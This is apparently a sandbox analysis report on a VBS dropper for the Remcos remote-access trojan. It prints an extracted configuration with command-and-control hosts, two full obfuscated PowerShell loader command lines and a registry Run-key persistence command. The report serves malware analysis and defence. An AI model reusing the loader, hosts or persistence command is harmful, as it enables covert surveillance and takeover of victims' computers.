Analysis

max time kernel: 148s
max time network: 151s
platform: windows10-2004_x64
resource: win10v2004-20241007-en
resource tags: arch:x64, arch:x86, image:win10v2004-20241007-en, locale:en-us, os:windows10-2004-x64, system
submitted: 02-12-2024 06:25

Static task: static1
Behavioral task: behavioral1
Sample: 화물_계획__부 가능_계획_pdg.vbs
Resource: win7-20240903-en
General

Target: 화물_계획__부 가능_계획_pdg.vbs
Size: 35KB
MD5: 4c39309bcbb9c031d27c488bac0ed6ec
SHA1: 29e1270f6a8eaa63fa37f33760a3a1d33e807863
SHA256: 2b9370b8bd4cf96c6b5f44b84e74a767fa5182ab30638fce31de2616aa01ab50
SHA512: 928eeb213f33f015a6424506c2a8d023e636cddc8392774df829dfb56cb22ddc4ccae611f33527665a33d5692e0672d38b0979ddfb86ff4883047cafa0c3aa86
SSDEEP: 384:65cVCJUSNoVEItu5uBHNIc6n+210mlT5Ve3qOGHr84F4K:65cXSNhCu5qNIc6+2HlNMqOOr8gx
Malware Config

Extracted
remcos
Fresh
dourtes4hnbouy1.duckdns.org:2487
dourtes4hnbouy1.duckdns.org:2488
dourtes4hnbouy2.duckdns.org:2487
dourtes4hnbouy3.duckdns.org:2487
dourtes4hnbouy4.duckdns.org:2487

audio_folder: MicRecords
audio_path: ApplicationPath
audio_record_time: 5
connect_delay: 0
connect_interval: 1
copy_file: remcos.exe
copy_folder: Remcos
delete_file: false
hide_file: false
hide_keylog_file: true
install_flag: false
keylog_crypt: false
keylog_file: kamzourts.dat
keylog_flag: false
keylog_path: %AppData%
mouse_option: false
mutex: kamncbiu-LBXP9X
screenshot_crypt: false
screenshot_flag: false
screenshot_folder: Screenshots
screenshot_path: %AppData%
screenshot_time: 10
startup_value:
take_screenshot_option: false
take_screenshot_time: 5
Signatures

Remcos family

Blocklisted process makes network request (7 IoCs)
  flow  pid   Process
  5     4004  WScript.exe
  11    4472  powershell.exe
  37    2056  msiexec.exe
  39    2056  msiexec.exe
  41    2056  msiexec.exe
  45    2056  msiexec.exe
  47    2056  msiexec.exe

Checks computer location settings (2 TTPs, 1 IoC)
Looks up country code configured in the registry, likely geofence.
  description        ioc                                                                                               Process
  Key value queried  \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\Control Panel\International\Geo\Nation  WScript.exe

Adds Run key to start application (2 TTPs, 1 IoC)
  description      ioc                                                                                                                                                                                                                                                      Process
  Set value (str)  \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Rhabdosphere = "%nervemediciners% -windowstyle 1 $Decoke247=(gp -Path 'HKCU:\\Software\\Extratemporal\\').Konkursbegringer;%nervemediciners% ($Decoke247)"  reg.exe

Command and Scripting Interpreter: PowerShell
  pid   Process
  4472  powershell.exe
  2936  powershell.exe

Network Service Discovery
  pid   Process
  4472  powershell.exe
  2936  powershell.exe

Suspicious use of NtCreateThreadExHideFromDebugger (1 IoC)
  pid   Process
  2056  msiexec.exe

Suspicious use of NtSetInformationThreadHideFromDebugger (2 IoCs)
  pid   Process
  2936  powershell.exe
  2056  msiexec.exe

Enumerates physical storage devices (1 TTP)
Attempts to interact with connected storage/optical drive(s).

System Location Discovery: System Language Discovery (1 TTP, 4 IoCs)
Attempts to gather information about the system language of a victim in order to infer the geographical location of that host.
  description  ioc                                                          Process
  Key opened   \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language  powershell.exe
  Key opened   \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language  msiexec.exe
  Key opened   \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language  cmd.exe
  Key opened   \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language  reg.exe

Modifies registry key (1 TTP, 1 IoC)
  pid   Process
  4324  reg.exe

Suspicious behavior: EnumeratesProcesses (5 IoCs)
  pid   Process
  4472  powershell.exe
  4472  powershell.exe
  2936  powershell.exe
  2936  powershell.exe
  2936  powershell.exe

Suspicious behavior: MapViewOfSection (1 IoC)
  pid   Process
  2936  powershell.exe

Suspicious use of AdjustPrivilegeToken (2 IoCs)
  description              pid   Process
  Token: SeDebugPrivilege  4472  powershell.exe
  Token: SeDebugPrivilege  2936  powershell.exe

Suspicious use of SetWindowsHookEx (1 IoC)
  pid   Process
  2056  msiexec.exe

Suspicious use of WriteProcessMemory (12 IoCs)
  description                        pid   Process         procid_target
  PID 4004 wrote to memory of 4472   4004  WScript.exe     83
  PID 4004 wrote to memory of 4472   4004  WScript.exe     83
  PID 2936 wrote to memory of 2056   2936  powershell.exe  100
  PID 2936 wrote to memory of 2056   2936  powershell.exe  100
  PID 2936 wrote to memory of 2056   2936  powershell.exe  100
  PID 2936 wrote to memory of 2056   2936  powershell.exe  100
  PID 2056 wrote to memory of 3760   2056  msiexec.exe     104
  PID 2056 wrote to memory of 3760   2056  msiexec.exe     104
  PID 2056 wrote to memory of 3760   2056  msiexec.exe     104
  PID 3760 wrote to memory of 4324   3760  cmd.exe         107
  PID 3760 wrote to memory of 4324   3760  cmd.exe         107
  PID 3760 wrote to memory of 4324   3760  cmd.exe         107
Processes

C:\Windows\System32\WScript.exe  (depth 1)
  Command line: "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\화물_계획__부 가능_계획_pdg.vbs"
  - Blocklisted process makes network request
  - Checks computer location settings
  - Suspicious use of WriteProcessMemory
  PID: 4004

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" ";$Arrenotokous='Homogeniserendes';;$Gorged='Woodless';;$Ramuliferous='Udbyttekonfiskationernes';;$Origenize='Anrettede';;$Stbningen=$host.Name;function Grecized($Roburite){If ($Stbningen) {$Scyphopolyp=5} for ($Doucepere=$Scyphopolyp;;$Doucepere+=6){if(!$Roburite[$Doucepere]) { break };$Indkringsfases+=$Roburite[$Doucepere];$Nonvaporousness='Turboladers'}$Indkringsfases}function Indpiskedes($Solbatterier){ .($Afkrydser) ($Solbatterier)}$Douceperensignificance=Grecized 'SkndsnNonreESkovstAssol.Ove tW';$Douceperensignificance+=Grecized ' .upeEReserBEfterC I aulSmu tiMo faeJerseN Monat';$Percussiveness=Grecized 'Haa tMSensio,kitjzFlashi ForllTerbel T.lgaDagpl/';$Khz=Grecized ' BrugTko tolTrmassTele.1error2';$Naturalisterne='Purpo[Tom uN InsueResert ande. eskSFnotyE RuslRTekstvEnh dIGy.efCTe riEWondePSpr eO T psi D wnn BridtFattiM ReedAFas lN aadeaB saeg nwiESm glRPalla]Rack :Menne: SrboSenginE O blC CompUOutj.r aziIRattlt Ko ayDermaPAfgifr O.enOPhenoTudlbeO irkucNoncooTransL Data= Bqnh$ CossKPreseHWelteZ';$Percussiveness+=Grecized 'B ewa5Xanth.Neapo0honno Vaske(PhlebWPteroiHypernAlloddAnthro BolvwFiantsScyth TzitzN ProsT Fo g St.rk1Forma0Ml ek.Videb0Vicar;Capt Bo.erWLnnetiUds.enChaet6Sedde4Langh;Baand anvisxOverl6Kultu4 coac;Refa Indlar TyndvLngod: Saml1Ety o3Nedsl1 k in.Tranq0 r gr) oggi .iscoG .aboeMicrocEru akLecthoAmapa/Radi 2Micro0Disti1g und0 Con 0 Hirs1Sla b0 ight1Urege UnnatFOpsnuiLgtnir FilteAlitafEncomo IndoxEkstr/Udfre1 ap,e3Eff k1I,ter.Bund 0';$Cliqueless106=Grecized ' Ne vUCa nesSigteeGaardrNahan-EyolfAHmsk.GRearmEH.cksNStandt';$Anarchy=Grecized ' UnshhTitictRustit KartpRanvesValut: ric/Mod r/YoupdsEsophhVaabea FasaaAutomv KorriStimupFormurRe ayoAlchef P ure SuccsU,delsObseriNonfioB.slunUnwalaF millOverg. 
SkifcH peioAutoommis i/ Ph nTProlohCircuiaffilaHjernzApodai magonPleaseRagef.RabarpSnders c mbd Str >PalaihOligotbrkmit,agenphostasSknki:D nat/Uncon/Tur.ue Ro lxKnledpConsolf ancoDrivrr,leckeAutolm TowseL avesInteroUnmeepLkkesoMatrotUnspiaPreyemElskviSonofaPemo..glomucOplanoByzanmTrili/ wretT rothBle,siOccasah.nknz NoneiSpd,rnT msve Chee.Paatap ,tinsirrevd';$Unreadable=Grecized 'hesit>';$Afkrydser=Grecized 'AdreniHotteeOphthX';$Sexdigitated='Stereoscopically';$ringeklokkers='\conventionalises.Tnd';Indpiskedes (Grecized 'Fnblg$N.rsegSup.rLForhaO SuprBPostvA ReinLNonfe: NonmDBusk.eTawatukieyet dloeEPreinrRingeOToetag,nfereEvighlOrthoA.nchatPri,toFraflSforlnEEngan=Skamb$ mophE femNtilbavStict:Unp.rAOver pInostpTalacdPositADistrt rykAHypov+Bibac$MasseROi pliIndusN OutsgKlippE Lov KSipprLSubt,ODggelK hertk AngoESneglRMurenS');Indpiskedes (Grecized 'Sem r$ BabigC llelRun,soSkrivBBidcoAGr aalm.nuf: NounTS nseJProdueTrashN .rseEChut,SScy,htOptomEVeridYDrabsD FineeThoralTrykksDri teForhon ThouSschel=Dunga$IsotraF rstnorb la erdsrepihyc SnakhHalvkyHedas.Ciff SStifip ColllIndicIGynanTSymph(Demon$idefouExpiaNPoin.Rsha.nECredeA RoadDNummeaBowleB XeroL lyk,eMuseo)');Indpiskedes (Grecized $Naturalisterne);$Anarchy=$tjenesteydelsens[0];$Carpodetus=(Grecized ' emal$ Respg De.oLRupicOOrdfoBthuggaUprail,cytt: Cochg fbilADomflAEtc iTSpo.sC ,rouhUn.cr=OverbnEluviE Norww Hype-Pern.oCoadvbBromijParasEI,strc ugnTSodom MathiS PleiYIns fSUdiscT inge UnhamOprrs.D nta$Crib dIsomeo UdryuPassicSigtvEShairP RygeEint,nRSp one S ygntidsbsUp avIMy,paG naxoN NonaiCoenafquetziSouthcBatraaAnalynUdsmycOpspae');Indpiskedes ($Carpodetus);Indpiskedes (Grecized 'Kv,av$ Ettyg KoloaPilleaDagsot Lu tcAnti hDesti.b aavH PakeeP lycalu efdBekereHelgorFagsps Unne[Sandw$ola sC elfilI proimagneq slinuM nteeDerogl GesneNonclsO torsEkstr1G.aas0Br,ds6Rotte]Plnek=Poeci$ VentPAspideOdin.rStaphcHidfrustavnsHe tesdes ai AttavEri.oeFibernFiltreCemens Chars');$Drvogternes=Grecized 'D.mna$KundggudmaraS edbaFogdet 
PartcDatabhBrnee.Co,biD ntihoAllelw Sy pnDiffulP oceoCompua OpsldTrailFH rebi PretlVi keeUppe,(Azte $.xcisAAarrina.etyaUddatrSkaa,cAdrtthTr,deyNongl,Retor$merglVDad.iaFlaskr FolkiCustogAst gh u vaeSud nd WronsFauntkseamrrVedkeaSeacovFastseOv retAspirsRecon)';$Varighedskravets=$Deuterogelatose;Indpiskedes (Grecized ' Tele$Gran g anelLSailfOCommyB U trA KernlCera.:C,balWJom ri VassLAlohalPostuA Klos=Bygni( nemeTBelize k ooS MombT aeri-Sags PGas rAsalmetRi bahSt am Ja z$VagarV HjemA BongrImitaIKanthgScrewhEfterEE staDGenitSbyronksertuRRestiAOu daVLachrEOtopit NvniSSeri )');while (!$Willa) {Indpiskedes (Grecized ' kitt$agadigKdebrl EmbooJuniobCryptaGladelJowel:ButteVSt.ckrLairig Ti,seThreanFuturdInsu,eDyrlg=Soveh$S rreOTam svSombreMoresrM entsAspirp rprgnexe udGlib t') ;Indpiskedes $Drvogternes;Indpiskedes (Grecized 'consts onttNeuroAPhalarGimpeTSk kt-UnmatSApparL FrakEVbnerEPr pop Regn Outdr4');Indpiskedes (Grecized 'Antip$GroungKrliglElutrO,xtrabRutefa nusiLStorm: U.rewClif,ICho.lLRe lalUsandASmoot=Binds(SkibstforgieChertsFishitPru t- OffiPPl ylA God,TBuck h Bibl Minus$Cli cvMi enaAlbumRBaronI Be hgAnskah xbeESt krDGenneS DaikkUnd.rRGlideAEndesVJourneNeds TnringsKatte)') ;Indpiskedes (Grecized 'Accel$ArillgShorelIlgodoRet rBD kumAPreselGiggl:VejleU IsooNBjergR Ot mIKylliPRyttepEud.eESkyttdCarpe=Soden$Subtog KardLCrushOTiggebRivinA Emb.lRedig: BasucTeaterKulkaOProtof Fulgt LagkS open+Flams+Pseud%,nspn$ eadot nalJKrediE CoernsaluteFor lSSnudeT TeddE lusy ElecDS uble TelelBacteSHimmeEFruenNexurgSUnoe .Fl keCJanniOSalthU Pos.nRestaT') ;$Anarchy=$tjenesteydelsens[$Unripped]}$Styrelses=287680;$Befile=33163;Indpiskedes (Grecized 'R.frn$RrhneGCylinLfa geoblackbAfgreain omLCente:V gnesHaustK S,roPBesnipDag ee supes Poli Ne.le=Gasse .arimGwindoeEventTIrske-ImidscIndvnoFormoNfeodotAffale PreinCarpotSk,ms Exsan$Progrvout.oAC relRIge,viS nkoGwait HTaffeELokalDAarstSJon uKAmfibR OpkaA Reolv TectEJimmiTLejr s');Indpiskedes (Grecized 'Ca,ry$SericgInv llApoteoOpdagbXerifaspecilS 
vne:Fo dsEBystekButtosAnelae Topsr MorncUdskie Ether O ereGuld.nTrkpadSmorzeOutpo3 name Ud ik=Ta ab Outr [HydroSAntagy SocisAmitytCenteeVaccemArbit.RenteCDunneoRh,omnTri,rvStbeseFagelrJordetMithr] Fogl:Mem n: C rcFFundrr DgnroStenkmUnderB ModtaProdus,loore Sta 6Alacr4S,illSetapet Kr.nrPerveibiodynCyklcgF,ura(Prep $VanrgS OpnakHoar p VerdpDivereNositsTapet)');Indpiskedes (Grecized ',ohre$B.ssiGFouril.mbibO.ovedbDemo aBi eslSbebo:DdsboPEntydRResorI Ame.S AntioSaltkPamadoldefm,Y abilsInappNEvakuIHroa nMo dagKol rEThrowrLurki Trinf=Konto Opfyl[ClasmsEks kyKrsels Mid tSevenehollomRive .Ac letReloaeAnmelxExce.TRival.T lskESamarNspr ncDeviaOTildrDKbma Ipap lNTransGBlotc]Skibs:Legio: KvalAOverpsHermicDissoIFathoi Sulp. StavGTerr EChedetAbnorsPancaT N nvRGuideIWise n onjgH avy(round$PujarECalipkHan.eS .ontEDitmarSubobcH,larE verkrPolype ConjNUnharDEduafEA.tie3Ki no)');Indpiskedes (Grecized 'Samle$ BathgRetraLDropsoBrdk BRijksAKofftlForgp:NedveUPrelodCertaK Sk,fO p,ccbMillilEj rleArrog2 Su c3palmi4Anton= Conv$LipohpnaissRMagtsI .iriS ndatOSkolePFalc,LUranoyCres Srekrun Maili H moNSge oGSag eeI idiRBebo .OmplaS fad.uSkaerbBrddes Mestt ref,rRe orIfrysen KubiGhjsan(sta,e$g.rlesLibelTDriftYDolkerAfslrEMyrssLS.idsSem usE fo,kS Nonc, ,kat$Surr,BCope eCannufSt esI,ldslL artrEGyasd)');Indpiskedes $Udkoble234;"2⤵
    - Blocklisted process makes network request
    - Command and Scripting Interpreter: PowerShell
    - Network Service Discovery
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID: 4472

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" ";$Arrenotokous='Homogeniserendes';;$Gorged='Woodless';;$Ramuliferous='Udbyttekonfiskationernes';;$Origenize='Anrettede';;$Stbningen=$host.Name;function Grecized($Roburite){If ($Stbningen) {$Scyphopolyp=5} for ($Doucepere=$Scyphopolyp;;$Doucepere+=6){if(!$Roburite[$Doucepere]) { break };$Indkringsfases+=$Roburite[$Doucepere];$Nonvaporousness='Turboladers'}$Indkringsfases}function Indpiskedes($Solbatterier){ .($Afkrydser) ($Solbatterier)}$Douceperensignificance=Grecized 'SkndsnNonreESkovstAssol.Ove tW';$Douceperensignificance+=Grecized ' .upeEReserBEfterC I aulSmu tiMo faeJerseN Monat';$Percussiveness=Grecized 'Haa tMSensio,kitjzFlashi ForllTerbel T.lgaDagpl/';$Khz=Grecized ' BrugTko tolTrmassTele.1error2';$Naturalisterne='Purpo[Tom uN InsueResert ande. eskSFnotyE RuslRTekstvEnh dIGy.efCTe riEWondePSpr eO T psi D wnn BridtFattiM ReedAFas lN aadeaB saeg nwiESm glRPalla]Rack :Menne: SrboSenginE O blC CompUOutj.r aziIRattlt Ko ayDermaPAfgifr O.enOPhenoTudlbeO irkucNoncooTransL Data= Bqnh$ CossKPreseHWelteZ';$Percussiveness+=Grecized 'B ewa5Xanth.Neapo0honno Vaske(PhlebWPteroiHypernAlloddAnthro BolvwFiantsScyth TzitzN ProsT Fo g St.rk1Forma0Ml ek.Videb0Vicar;Capt Bo.erWLnnetiUds.enChaet6Sedde4Langh;Baand anvisxOverl6Kultu4 coac;Refa Indlar TyndvLngod: Saml1Ety o3Nedsl1 k in.Tranq0 r gr) oggi .iscoG .aboeMicrocEru akLecthoAmapa/Radi 2Micro0Disti1g und0 Con 0 Hirs1Sla b0 ight1Urege UnnatFOpsnuiLgtnir FilteAlitafEncomo IndoxEkstr/Udfre1 ap,e3Eff k1I,ter.Bund 0';$Cliqueless106=Grecized ' Ne vUCa nesSigteeGaardrNahan-EyolfAHmsk.GRearmEH.cksNStandt';$Anarchy=Grecized ' UnshhTitictRustit KartpRanvesValut: ric/Mod r/YoupdsEsophhVaabea FasaaAutomv KorriStimupFormurRe ayoAlchef P ure SuccsU,delsObseriNonfioB.slunUnwalaF millOverg. 
SkifcH peioAutoommis i/ Ph nTProlohCircuiaffilaHjernzApodai magonPleaseRagef.RabarpSnders c mbd Str >PalaihOligotbrkmit,agenphostasSknki:D nat/Uncon/Tur.ue Ro lxKnledpConsolf ancoDrivrr,leckeAutolm TowseL avesInteroUnmeepLkkesoMatrotUnspiaPreyemElskviSonofaPemo..glomucOplanoByzanmTrili/ wretT rothBle,siOccasah.nknz NoneiSpd,rnT msve Chee.Paatap ,tinsirrevd';$Unreadable=Grecized 'hesit>';$Afkrydser=Grecized 'AdreniHotteeOphthX';$Sexdigitated='Stereoscopically';$ringeklokkers='\conventionalises.Tnd';Indpiskedes (Grecized 'Fnblg$N.rsegSup.rLForhaO SuprBPostvA ReinLNonfe: NonmDBusk.eTawatukieyet dloeEPreinrRingeOToetag,nfereEvighlOrthoA.nchatPri,toFraflSforlnEEngan=Skamb$ mophE femNtilbavStict:Unp.rAOver pInostpTalacdPositADistrt rykAHypov+Bibac$MasseROi pliIndusN OutsgKlippE Lov KSipprLSubt,ODggelK hertk AngoESneglRMurenS');Indpiskedes (Grecized 'Sem r$ BabigC llelRun,soSkrivBBidcoAGr aalm.nuf: NounTS nseJProdueTrashN .rseEChut,SScy,htOptomEVeridYDrabsD FineeThoralTrykksDri teForhon ThouSschel=Dunga$IsotraF rstnorb la erdsrepihyc SnakhHalvkyHedas.Ciff SStifip ColllIndicIGynanTSymph(Demon$idefouExpiaNPoin.Rsha.nECredeA RoadDNummeaBowleB XeroL lyk,eMuseo)');Indpiskedes (Grecized $Naturalisterne);$Anarchy=$tjenesteydelsens[0];$Carpodetus=(Grecized ' emal$ Respg De.oLRupicOOrdfoBthuggaUprail,cytt: Cochg fbilADomflAEtc iTSpo.sC ,rouhUn.cr=OverbnEluviE Norww Hype-Pern.oCoadvbBromijParasEI,strc ugnTSodom MathiS PleiYIns fSUdiscT inge UnhamOprrs.D nta$Crib dIsomeo UdryuPassicSigtvEShairP RygeEint,nRSp one S ygntidsbsUp avIMy,paG naxoN NonaiCoenafquetziSouthcBatraaAnalynUdsmycOpspae');Indpiskedes ($Carpodetus);Indpiskedes (Grecized 'Kv,av$ Ettyg KoloaPilleaDagsot Lu tcAnti hDesti.b aavH PakeeP lycalu efdBekereHelgorFagsps Unne[Sandw$ola sC elfilI proimagneq slinuM nteeDerogl GesneNonclsO torsEkstr1G.aas0Br,ds6Rotte]Plnek=Poeci$ VentPAspideOdin.rStaphcHidfrustavnsHe tesdes ai AttavEri.oeFibernFiltreCemens Chars');$Drvogternes=Grecized 'D.mna$KundggudmaraS edbaFogdet 
PartcDatabhBrnee.Co,biD ntihoAllelw Sy pnDiffulP oceoCompua OpsldTrailFH rebi PretlVi keeUppe,(Azte $.xcisAAarrina.etyaUddatrSkaa,cAdrtthTr,deyNongl,Retor$merglVDad.iaFlaskr FolkiCustogAst gh u vaeSud nd WronsFauntkseamrrVedkeaSeacovFastseOv retAspirsRecon)';$Varighedskravets=$Deuterogelatose;Indpiskedes (Grecized ' Tele$Gran g anelLSailfOCommyB U trA KernlCera.:C,balWJom ri VassLAlohalPostuA Klos=Bygni( nemeTBelize k ooS MombT aeri-Sags PGas rAsalmetRi bahSt am Ja z$VagarV HjemA BongrImitaIKanthgScrewhEfterEE staDGenitSbyronksertuRRestiAOu daVLachrEOtopit NvniSSeri )');while (!$Willa) {Indpiskedes (Grecized ' kitt$agadigKdebrl EmbooJuniobCryptaGladelJowel:ButteVSt.ckrLairig Ti,seThreanFuturdInsu,eDyrlg=Soveh$S rreOTam svSombreMoresrM entsAspirp rprgnexe udGlib t') ;Indpiskedes $Drvogternes;Indpiskedes (Grecized 'consts onttNeuroAPhalarGimpeTSk kt-UnmatSApparL FrakEVbnerEPr pop Regn Outdr4');Indpiskedes (Grecized 'Antip$GroungKrliglElutrO,xtrabRutefa nusiLStorm: U.rewClif,ICho.lLRe lalUsandASmoot=Binds(SkibstforgieChertsFishitPru t- OffiPPl ylA God,TBuck h Bibl Minus$Cli cvMi enaAlbumRBaronI Be hgAnskah xbeESt krDGenneS DaikkUnd.rRGlideAEndesVJourneNeds TnringsKatte)') ;Indpiskedes (Grecized 'Accel$ArillgShorelIlgodoRet rBD kumAPreselGiggl:VejleU IsooNBjergR Ot mIKylliPRyttepEud.eESkyttdCarpe=Soden$Subtog KardLCrushOTiggebRivinA Emb.lRedig: BasucTeaterKulkaOProtof Fulgt LagkS open+Flams+Pseud%,nspn$ eadot nalJKrediE CoernsaluteFor lSSnudeT TeddE lusy ElecDS uble TelelBacteSHimmeEFruenNexurgSUnoe .Fl keCJanniOSalthU Pos.nRestaT') ;$Anarchy=$tjenesteydelsens[$Unripped]}$Styrelses=287680;$Befile=33163;Indpiskedes (Grecized 'R.frn$RrhneGCylinLfa geoblackbAfgreain omLCente:V gnesHaustK S,roPBesnipDag ee supes Poli Ne.le=Gasse .arimGwindoeEventTIrske-ImidscIndvnoFormoNfeodotAffale PreinCarpotSk,ms Exsan$Progrvout.oAC relRIge,viS nkoGwait HTaffeELokalDAarstSJon uKAmfibR OpkaA Reolv TectEJimmiTLejr s');Indpiskedes (Grecized 'Ca,ry$SericgInv llApoteoOpdagbXerifaspecilS 
vne:Fo dsEBystekButtosAnelae Topsr MorncUdskie Ether O ereGuld.nTrkpadSmorzeOutpo3 name Ud ik=Ta ab Outr [HydroSAntagy SocisAmitytCenteeVaccemArbit.RenteCDunneoRh,omnTri,rvStbeseFagelrJordetMithr] Fogl:Mem n: C rcFFundrr DgnroStenkmUnderB ModtaProdus,loore Sta 6Alacr4S,illSetapet Kr.nrPerveibiodynCyklcgF,ura(Prep $VanrgS OpnakHoar p VerdpDivereNositsTapet)');Indpiskedes (Grecized ',ohre$B.ssiGFouril.mbibO.ovedbDemo aBi eslSbebo:DdsboPEntydRResorI Ame.S AntioSaltkPamadoldefm,Y abilsInappNEvakuIHroa nMo dagKol rEThrowrLurki Trinf=Konto Opfyl[ClasmsEks kyKrsels Mid tSevenehollomRive .Ac letReloaeAnmelxExce.TRival.T lskESamarNspr ncDeviaOTildrDKbma Ipap lNTransGBlotc]Skibs:Legio: KvalAOverpsHermicDissoIFathoi Sulp. StavGTerr EChedetAbnorsPancaT N nvRGuideIWise n onjgH avy(round$PujarECalipkHan.eS .ontEDitmarSubobcH,larE verkrPolype ConjNUnharDEduafEA.tie3Ki no)');Indpiskedes (Grecized 'Samle$ BathgRetraLDropsoBrdk BRijksAKofftlForgp:NedveUPrelodCertaK Sk,fO p,ccbMillilEj rleArrog2 Su c3palmi4Anton= Conv$LipohpnaissRMagtsI .iriS ndatOSkolePFalc,LUranoyCres Srekrun Maili H moNSge oGSag eeI idiRBebo .OmplaS fad.uSkaerbBrddes Mestt ref,rRe orIfrysen KubiGhjsan(sta,e$g.rlesLibelTDriftYDolkerAfslrEMyrssLS.idsSem usE fo,kS Nonc, ,kat$Surr,BCope eCannufSt esI,ldslL artrEGyasd)');Indpiskedes $Udkoble234;"1⤵
  - Command and Scripting Interpreter: PowerShell
  - Network Service Discovery
  - Suspicious use of NtSetInformationThreadHideFromDebugger
  - System Location Discovery: System Language Discovery
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious behavior: MapViewOfSection
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID: 2936

  C:\Windows\SysWOW64\msiexec.exe  (depth 2)
    Command line: "C:\Windows\SysWOW64\msiexec.exe"
    - Blocklisted process makes network request
    - Suspicious use of NtCreateThreadExHideFromDebugger
    - Suspicious use of NtSetInformationThreadHideFromDebugger
    - System Location Discovery: System Language Discovery
    - Suspicious use of SetWindowsHookEx
    - Suspicious use of WriteProcessMemory
    PID: 2056

    C:\Windows\SysWOW64\cmd.exe  (depth 3)
      Command line: "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Rhabdosphere" /t REG_EXPAND_SZ /d "%nervemediciners% -windowstyle 1 $Decoke247=(gp -Path 'HKCU:\Software\Extratemporal\').Konkursbegringer;%nervemediciners% ($Decoke247)"
      - System Location Discovery: System Language Discovery
      - Suspicious use of WriteProcessMemory
      PID: 3760

      C:\Windows\SysWOW64\reg.exe  (depth 4)
        Command line: REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Rhabdosphere" /t REG_EXPAND_SZ /d "%nervemediciners% -windowstyle 1 $Decoke247=(gp -Path 'HKCU:\Software\Extratemporal\').Konkursbegringer;%nervemediciners% ($Decoke247)"
        - Adds Run key to start application
        - System Location Discovery: System Language Discovery
        - Modifies registry key
        PID: 4324

MITRE ATT&CK Enterprise v15

Downloads

Filesize: 1KB
MD5: d4ff23c124ae23955d34ae2a7306099a
SHA1: b814e3331a09a27acfcd114d0c8fcb07957940a3
SHA256: 1de6cfd5e02c052e3475d33793b6a150b2dd6eebbf0aa3e4c8e4e2394a240a87
SHA512: f447a6042714ae99571014af14bca9d87ede59af68a0fa1d880019e9f1aa41af8cbf9c08b0fea2ccb7caa48165a75825187996ea6939ee8370afa33c9f809e79

Filesize: 60B
MD5: d17fe0a3f47be24a6453e9ef58c94641
SHA1: 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256: 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512: 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Filesize: 417KB
MD5: b8267bb25d5a59bcecb954056bbccd90
SHA1: 27984573c59bf3e2d726f3b7b011671caf50fa38
SHA256: 8b9e7d853510e474c2781553ba6a59cd2483b30603923a36cd7a9c1ea40b9b3e
SHA512: 24aeca3998b197f92ab19a24cf954195fbfa1026dcc19a0e3414ee2ab1cb86afc3e12686b72faeda510288233f57c979b4731f484b96be4429325cadc7d4c4ad